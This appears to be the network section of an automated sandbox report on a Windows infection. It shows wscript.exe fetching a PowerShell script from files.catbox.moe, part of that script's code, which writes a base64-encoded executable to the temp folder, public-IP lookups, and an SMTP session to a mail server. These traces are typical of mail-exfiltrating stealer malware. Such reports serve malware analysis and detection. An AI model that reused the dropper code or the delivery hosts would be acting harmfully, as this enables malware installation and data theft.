Jan 9, 2025 18:33:11.624373913 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.625238895 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.625252008 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.625298023 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.625305891 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.625335932 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.625368118 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.626116991 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.626132011 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.626173973 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.626182079 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.626218081 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.626934052 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.626949072 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.627005100 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.627007961 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.627017021 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.627057076 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.627068996 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.627073050 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.627105951 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:11.627132893 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.627161026 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.627794027 CET  49730        443        192.168.2.4      108.181.20.35
Jan 9, 2025 18:33:11.627810955 CET  443          49730      108.181.20.35    192.168.2.4
Jan 9, 2025 18:33:18.866297960 CET  49731        80         192.168.2.4      132.226.247.73
Jan 9, 2025 18:33:18.871141911 CET  80           49731      132.226.247.73   192.168.2.4
Jan 9, 2025 18:33:18.871334076 CET  49731        80         192.168.2.4      132.226.247.73
Jan 9, 2025 18:33:18.871431112 CET  49731        80         192.168.2.4      132.226.247.73
Jan 9, 2025 18:33:18.876188040 CET  80           49731      132.226.247.73   192.168.2.4
Jan 9, 2025 18:33:19.559628010 CET  80           49731      132.226.247.73   192.168.2.4
Jan 9, 2025 18:33:19.563570976 CET  49731        80         192.168.2.4      132.226.247.73
Jan 9, 2025 18:33:19.568381071 CET  80           49731      132.226.247.73   192.168.2.4
Jan 9, 2025 18:33:19.775367975 CET  80           49731      132.226.247.73   192.168.2.4
Jan 9, 2025 18:33:19.799343109 CET  49732        443        192.168.2.4      104.21.96.1
Jan 9, 2025 18:33:19.799387932 CET  443          49732      104.21.96.1      192.168.2.4
Jan 9, 2025 18:33:19.799504042 CET  49732        443        192.168.2.4      104.21.96.1
Jan 9, 2025 18:33:19.809120893 CET  49732        443        192.168.2.4      104.21.96.1
Jan 9, 2025 18:33:19.809160948 CET  443          49732      104.21.96.1      192.168.2.4
Jan 9, 2025 18:33:19.821959972 CET  49731        80         192.168.2.4      132.226.247.73
Jan 9, 2025 18:33:20.347222090 CET  443          49732      104.21.96.1      192.168.2.4
Jan 9, 2025 18:33:20.347342968 CET  49732        443        192.168.2.4      104.21.96.1
Jan 9, 2025 18:33:20.396645069 CET  49732        443        192.168.2.4      104.21.96.1
Jan 9, 2025 18:33:20.396670103 CET  443          49732      104.21.96.1      192.168.2.4
Jan 9, 2025 18:33:20.397109032 CET  443          49732      104.21.96.1      192.168.2.4
Jan 9, 2025 18:33:20.447334051 CET  49732        443        192.168.2.4      104.21.96.1
Jan 9, 2025 18:33:20.546648979 CET  49732        443        192.168.2.4      104.21.96.1
Jan 9, 2025 18:33:20.587337017 CET  443          49732      104.21.96.1      192.168.2.4
Jan 9, 2025 18:33:20.794265985 CET  443          49732      104.21.96.1      192.168.2.4
Jan 9, 2025 18:33:20.794332027 CET  443          49732      104.21.96.1      192.168.2.4
Jan 9, 2025 18:33:20.794420004 CET  49732        443        192.168.2.4      104.21.96.1
Jan 9, 2025 18:33:20.830086946 CET  49732        443        192.168.2.4      104.21.96.1
Jan 9, 2025 18:33:26.167696953 CET  49731        80         192.168.2.4      132.226.247.73
Jan 9, 2025 18:33:26.172496080 CET  80           49731      132.226.247.73   192.168.2.4
Jan 9, 2025 18:33:26.380079985 CET  80           49731      132.226.247.73   192.168.2.4
Jan 9, 2025 18:33:26.440288067 CET  49731        80         192.168.2.4      132.226.247.73
Jan 9, 2025 18:33:27.135301113 CET  49736        587        192.168.2.4      123.30.244.30
Jan 9, 2025 18:33:27.140080929 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:27.141845942 CET  49736        587        192.168.2.4      123.30.244.30
Jan 9, 2025 18:33:28.874438047 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:28.874634981 CET  49736        587        192.168.2.4      123.30.244.30
Jan 9, 2025 18:33:28.879435062 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:29.441633940 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:29.441786051 CET  49736        587        192.168.2.4      123.30.244.30
Jan 9, 2025 18:33:29.446611881 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:29.789529085 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:29.790056944 CET  49736        587        192.168.2.4      123.30.244.30
Jan 9, 2025 18:33:29.794807911 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:30.145617962 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:30.145627975 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:30.145693064 CET  49736        587        192.168.2.4      123.30.244.30
Jan 9, 2025 18:33:30.145888090 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:30.145987988 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:30.146032095 CET  49736        587        192.168.2.4      123.30.244.30
Jan 9, 2025 18:33:30.146183014 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:30.146239996 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:30.146284103 CET  49736        587        192.168.2.4      123.30.244.30
Jan 9, 2025 18:33:30.235999107 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:30.253505945 CET  49736        587        192.168.2.4      123.30.244.30
Jan 9, 2025 18:33:30.258430958 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:30.653846979 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:30.660727978 CET  49736        587        192.168.2.4      123.30.244.30
Jan 9, 2025 18:33:30.665494919 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:31.059159994 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:31.060363054 CET  49736        587        192.168.2.4      123.30.244.30
Jan 9, 2025 18:33:31.065166950 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:31.408709049 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:31.409044027 CET  49736        587        192.168.2.4      123.30.244.30
Jan 9, 2025 18:33:31.413813114 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:32.120556116 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:32.120804071 CET  49736        587        192.168.2.4      123.30.244.30
Jan 9, 2025 18:33:32.127088070 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:32.545300007 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:32.545598030 CET  49736        587        192.168.2.4      123.30.244.30
Jan 9, 2025 18:33:32.550415993 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:32.908843994 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:32.909173965 CET  49736        587        192.168.2.4      123.30.244.30
Jan 9, 2025 18:33:32.914009094 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:33.294158936 CET  587          49736      123.30.244.30    192.168.2.4
Jan 9, 2025 18:33:33.295015097 CET  49736        587        192.168.2.4      123.30.244.30
Jan 9, 2025 18:33:33.295015097 CET  49736        587        192.168.2.4      123.30.244.30
Jan 9, 2025 18:33:33.295015097 CET  49736        587        192.168.2.4      123.30.244.30
Jan 9, 2025 18:33:33.295015097 CET  49736        587        192.168.2.4      123.30.244.30
                                                                                                      Jan 9, 2025 18:33:33.299941063 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:33.299952984 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:33.300075054 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:33.300084114 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:35.325654984 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:33:35.369226933 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:34:16.400517941 CET4973180192.168.2.4132.226.247.73
                                                                                                      Jan 9, 2025 18:34:16.405443907 CET8049731132.226.247.73192.168.2.4
                                                                                                      Jan 9, 2025 18:34:16.405509949 CET4973180192.168.2.4132.226.247.73
                                                                                                      Jan 9, 2025 18:35:06.417788029 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:35:06.422734022 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:35:07.917037010 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:35:07.917216063 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:35:07.917269945 CET58749736123.30.244.30192.168.2.4
                                                                                                      Jan 9, 2025 18:35:07.917401075 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:35:07.917401075 CET49736587192.168.2.4123.30.244.30
                                                                                                      Jan 9, 2025 18:35:07.917999029 CET49736587192.168.2.4123.30.244.30
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 9, 2025 18:33:10.269741058 CET | 57199 | 53 | 192.168.2.4 | 1.1.1.1
Jan 9, 2025 18:33:10.278704882 CET | 53 | 57199 | 1.1.1.1 | 192.168.2.4
Jan 9, 2025 18:33:18.852330923 CET | 59930 | 53 | 192.168.2.4 | 1.1.1.1
Jan 9, 2025 18:33:18.859540939 CET | 53 | 59930 | 1.1.1.1 | 192.168.2.4
Jan 9, 2025 18:33:19.789216995 CET | 64359 | 53 | 192.168.2.4 | 1.1.1.1
Jan 9, 2025 18:33:19.797038078 CET | 53 | 64359 | 1.1.1.1 | 192.168.2.4
Jan 9, 2025 18:33:26.392050028 CET | 56946 | 53 | 192.168.2.4 | 1.1.1.1
Jan 9, 2025 18:33:27.130851030 CET | 53 | 56946 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 9, 2025 18:33:10.269741058 CET | 192.168.2.4 | 1.1.1.1 | 0xe37b | Standard query (0) | files.catbox.moe | A (IP address) | IN (0x0001) | false
Jan 9, 2025 18:33:18.852330923 CET | 192.168.2.4 | 1.1.1.1 | 0xb41d | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 9, 2025 18:33:19.789216995 CET | 192.168.2.4 | 1.1.1.1 | 0x5ea | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 9, 2025 18:33:26.392050028 CET | 192.168.2.4 | 1.1.1.1 | 0x9848 | Standard query (0) | mail.phobinh.com.vn | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 9, 2025 18:33:10.278704882 CET | 1.1.1.1 | 192.168.2.4 | 0xe37b | No error (0) | files.catbox.moe | | 108.181.20.35 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 18:33:18.859540939 CET | 1.1.1.1 | 192.168.2.4 | 0xb41d | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 18:33:18.859540939 CET | 1.1.1.1 | 192.168.2.4 | 0xb41d | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 18:33:18.859540939 CET | 1.1.1.1 | 192.168.2.4 | 0xb41d | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 18:33:18.859540939 CET | 1.1.1.1 | 192.168.2.4 | 0xb41d | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 18:33:18.859540939 CET | 1.1.1.1 | 192.168.2.4 | 0xb41d | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 18:33:18.859540939 CET | 1.1.1.1 | 192.168.2.4 | 0xb41d | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 18:33:19.797038078 CET | 1.1.1.1 | 192.168.2.4 | 0x5ea | No error (0) | reallyfreegeoip.org | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 18:33:19.797038078 CET | 1.1.1.1 | 192.168.2.4 | 0x5ea | No error (0) | reallyfreegeoip.org | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 18:33:19.797038078 CET | 1.1.1.1 | 192.168.2.4 | 0x5ea | No error (0) | reallyfreegeoip.org | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 18:33:19.797038078 CET | 1.1.1.1 | 192.168.2.4 | 0x5ea | No error (0) | reallyfreegeoip.org | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 18:33:19.797038078 CET | 1.1.1.1 | 192.168.2.4 | 0x5ea | No error (0) | reallyfreegeoip.org | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 18:33:19.797038078 CET | 1.1.1.1 | 192.168.2.4 | 0x5ea | No error (0) | reallyfreegeoip.org | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 18:33:19.797038078 CET | 1.1.1.1 | 192.168.2.4 | 0x5ea | No error (0) | reallyfreegeoip.org | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 9, 2025 18:33:27.130851030 CET | 1.1.1.1 | 192.168.2.4 | 0x9848 | No error (0) | mail.phobinh.com.vn | mail24430.maychuemail.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 9, 2025 18:33:27.130851030 CET | 1.1.1.1 | 192.168.2.4 | 0x9848 | No error (0) | mail24430.maychuemail.com | | 123.30.244.30 | A (IP address) | IN (0x0001) | false
• files.catbox.moe
• reallyfreegeoip.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 132.226.247.73 | 80 | 7704 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
Jan 9, 2025 18:33:18.871431112 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 9, 2025 18:33:19.559628010 CET | 273 | IN | HTTP/1.1 200 OK
Date: Thu, 09 Jan 2025 17:33:19 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 9, 2025 18:33:19.563570976 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 9, 2025 18:33:19.775367975 CET | 273 | IN | HTTP/1.1 200 OK
Date: Thu, 09 Jan 2025 17:33:19 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 9, 2025 18:33:26.167696953 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 9, 2025 18:33:26.380079985 CET | 273 | IN | HTTP/1.1 200 OK
Date: Thu, 09 Jan 2025 17:33:26 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 108.181.20.35 | 443 | 7408 | C:\Windows\System32\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-09 17:33:11 UTC | 330 | OUT | GET /jqxrkk.ps1 HTTP/1.1
Accept: */*
Accept-Language: en-ch
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: files.catbox.moe
Connection: Keep-Alive
2025-01-09 17:33:11 UTC | 551 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 09 Jan 2025 17:33:11 GMT
Content-Type: application/octet-stream
Content-Length: 186488
Last-Modified: Thu, 09 Jan 2025 00:15:44 GMT
Connection: close
ETag: "677f1530-2d878"
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self';
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, HEAD
Accept-Ranges: bytes
                                                                                                      2025-01-09 17:33:11 UTC15833INData Raw: 24 70 3d 5b 49 4f 2e 50 61 74 68 5d 3a 3a 43 6f 6d 62 69 6e 65 28 24 65 6e 76 3a 54 45 4d 50 2c 22 78 2e 65 78 65 22 29 0d 0a 5b 49 4f 2e 46 69 6c 65 5d 3a 3a 57 72 69 74 65 41 6c 6c 42 79 74 65 73 28 24 70 2c 5b 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75
                                                                                                      Data Ascii: $p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUu
                                                                                                      2025-01-09 17:33:11 UTC16384INData Raw: 45 57 50 61 6e 6c 49 6c 7a 2b 6b 41 61 31 47 34 67 6c 53 76 31 2b 49 39 57 62 50 61 32 56 43 62 55 64 53 5a 55 37 6d 44 47 6c 35 78 34 75 6b 2f 6f 59 2f 77 55 6a 6b 77 4a 4a 38 34 72 47 4d 59 74 37 4f 35 30 67 59 75 42 77 58 62 6b 66 57 6f 34 63 32 32 2f 5a 75 63 74 5a 46 61 78 53 43 4c 70 6c 4a 4e 4e 6e 4b 33 42 49 74 48 39 6a 42 47 62 59 64 6f 50 64 4e 77 38 4f 75 6f 63 61 48 67 32 44 79 54 72 4f 70 72 37 2f 6e 6f 43 4c 55 4c 4a 6c 76 4b 6a 6f 78 63 44 61 6d 68 75 6c 59 2f 4f 31 39 75 59 4e 41 65 68 64 54 49 62 74 63 6f 52 39 34 31 36 56 53 58 67 7a 66 6b 44 50 50 61 4e 4f 76 43 39 49 65 57 6e 2b 4d 38 44 4d 71 6e 37 78 75 69 58 6b 79 39 62 6b 50 64 6f 51 62 69 6b 69 31 2b 77 75 56 45 6f 62 43 44 68 2f 6d 44 66 70 74 6e 41 4e 70 34 46 55 71 75 4c 31 49
                                                                                                      Data Ascii: EWPanlIlz+kAa1G4glSv1+I9WbPa2VCbUdSZU7mDGl5x4uk/oY/wUjkwJJ84rGMYt7O50gYuBwXbkfWo4c22/ZuctZFaxSCLplJNNnK3BItH9jBGbYdoPdNw8OuocaHg2DyTrOpr7/noCLULJlvKjoxcDamhulY/O19uYNAehdTIbtcoR9416VSXgzfkDPPaNOvC9IeWn+M8DMqn7xuiXky9bkPdoQbiki1+wuVEobCDh/mDfptnANp4FUquL1I
                                                                                                      2025-01-09 17:33:11 UTC16384INData Raw: 39 69 63 6c 65 2f 67 2b 63 36 57 6b 68 55 44 65 62 31 6a 48 34 75 75 39 31 4b 37 6f 6a 4f 6d 49 30 48 67 59 49 69 56 4e 64 6c 32 56 33 54 76 38 71 4f 30 46 71 41 66 34 6b 38 35 57 52 72 4d 71 75 72 31 4f 48 4e 4f 53 66 42 62 5a 65 36 48 57 45 55 47 5a 73 31 33 75 4e 67 6a 34 47 58 79 75 67 6b 2b 4a 4b 64 35 53 62 62 56 72 32 34 76 54 6c 41 45 32 71 48 48 75 47 78 66 6d 56 72 4c 42 53 6f 31 44 6d 6e 2f 4e 43 2b 4e 66 79 30 4f 39 77 4d 30 45 59 35 53 4a 4a 6e 32 44 69 58 69 37 30 65 46 4b 64 52 2b 7a 4d 36 47 54 51 72 76 5a 62 78 34 6c 61 54 6f 68 31 33 6e 4d 4f 55 31 6a 46 71 78 4c 5a 57 30 50 6d 35 36 4c 4f 67 35 53 67 53 4a 79 31 42 5a 30 34 42 69 4b 32 67 2b 32 64 47 43 69 79 61 37 70 49 51 53 73 2f 6d 79 50 4d 64 35 5a 73 4d 5a 66 36 77 55 33 64 38 32
                                                                                                      Data Ascii: 9icle/g+c6WkhUDeb1jH4uu91K7ojOmI0HgYIiVNdl2V3Tv8qO0FqAf4k85WRrMqur1OHNOSfBbZe6HWEUGZs13uNgj4GXyugk+JKd5SbbVr24vTlAE2qHHuGxfmVrLBSo1Dmn/NC+Nfy0O9wM0EY5SJJn2DiXi70eFKdR+zM6GTQrvZbx4laToh13nMOU1jFqxLZW0Pm56LOg5SgSJy1BZ04BiK2g+2dGCiya7pIQSs/myPMd5ZsMZf6wU3d82
                                                                                                      2025-01-09 17:33:11 UTC16384INData Raw: 31 6e 6e 2b 64 51 32 4e 55 71 67 4c 47 68 50 62 43 4d 2f 55 6e 44 36 31 62 45 61 36 36 48 76 65 2b 4a 5a 47 79 31 6d 69 36 39 34 71 50 6d 63 69 46 5a 57 75 30 4d 44 31 62 4d 51 73 78 52 72 6a 6c 2b 6e 6f 61 64 48 78 6f 57 4f 54 6c 73 61 77 63 41 74 4e 38 46 75 6f 71 72 68 68 63 77 77 30 74 36 51 31 44 32 48 6d 4f 74 64 59 51 2b 31 48 6e 4f 64 49 50 64 32 45 71 49 67 36 4b 4d 36 79 4f 48 6e 77 4a 47 66 7a 44 6b 76 66 47 58 68 57 73 46 70 41 2f 68 44 58 2f 6f 61 47 7a 78 6c 32 5a 6c 59 75 4b 2b 53 52 65 38 65 37 59 66 51 6f 59 75 78 75 6c 4f 7a 2f 34 49 59 45 35 36 48 6c 46 70 5a 63 35 61 4d 65 6e 71 51 34 59 66 75 44 62 4a 45 4b 35 61 64 41 62 43 35 52 5a 4d 32 76 65 34 30 2b 31 74 5a 6e 4a 6a 2b 37 4d 56 51 79 78 4d 66 4f 44 4c 55 64 38 37 4e 44 32 35 76
                                                                                                      Data Ascii: 1nn+dQ2NUqgLGhPbCM/UnD61bEa66Hve+JZGy1mi694qPmciFZWu0MD1bMQsxRrjl+noadHxoWOTlsawcAtN8Fuoqrhhcww0t6Q1D2HmOtdYQ+1HnOdIPd2EqIg6KM6yOHnwJGfzDkvfGXhWsFpA/hDX/oaGzxl2ZlYuK+SRe8e7YfQoYuxulOz/4IYE56HlFpZc5aMenqQ4YfuDbJEK5adAbC5RZM2ve40+1tZnJj+7MVQyxMfODLUd87ND25v
                                                                                                      2025-01-09 17:33:11 UTC16384INData Raw: 35 48 48 33 75 69 66 2f 56 51 6d 74 52 61 39 73 44 4a 53 69 79 38 63 78 38 6d 62 37 47 38 66 7a 6d 68 67 42 46 2b 34 55 74 68 46 73 48 43 76 62 71 71 41 37 57 59 35 67 54 2b 73 67 72 44 65 59 35 4a 69 44 31 7a 31 64 31 33 6d 55 79 50 2b 6d 66 38 4c 34 66 49 6a 75 55 71 61 43 6d 70 76 69 78 51 74 45 2b 7a 59 6e 6c 46 30 52 58 62 33 47 49 54 32 4f 48 56 65 45 6e 33 48 35 35 54 54 56 6e 66 6c 49 33 6f 32 41 4c 68 41 74 6e 2f 59 56 51 4e 4d 66 76 56 76 42 6b 6d 70 6d 36 62 2b 64 6b 6b 47 57 78 45 6a 31 45 6d 59 39 44 4e 38 78 62 35 42 32 33 47 5a 43 44 39 7a 4c 7a 68 52 48 75 47 66 32 50 46 43 56 73 30 35 66 43 6a 74 66 68 4c 78 34 75 4b 4e 4f 52 41 62 56 34 6a 6f 4b 38 77 4a 51 6f 76 75 66 52 46 4d 58 38 32 6e 5a 32 33 72 77 37 31 48 64 77 6b 6b 68 42 75 31
                                                                                                      Data Ascii: 5HH3uif/VQmtRa9sDJSiy8cx8mb7G8fzmhgBF+4UthFsHCvbqqA7WY5gT+sgrDeY5JiD1z1d13mUyP+mf8L4fIjuUqaCmpvixQtE+zYnlF0RXb3GIT2OHVeEn3H55TTVnflI3o2ALhAtn/YVQNMfvVvBkmpm6b+dkkGWxEj1EmY9DN8xb5B23GZCD9zLzhRHuGf2PFCVs05fCjtfhLx4uKNORAbV4joK8wJQovufRFMX82nZ23rw71HdwkkhBu1
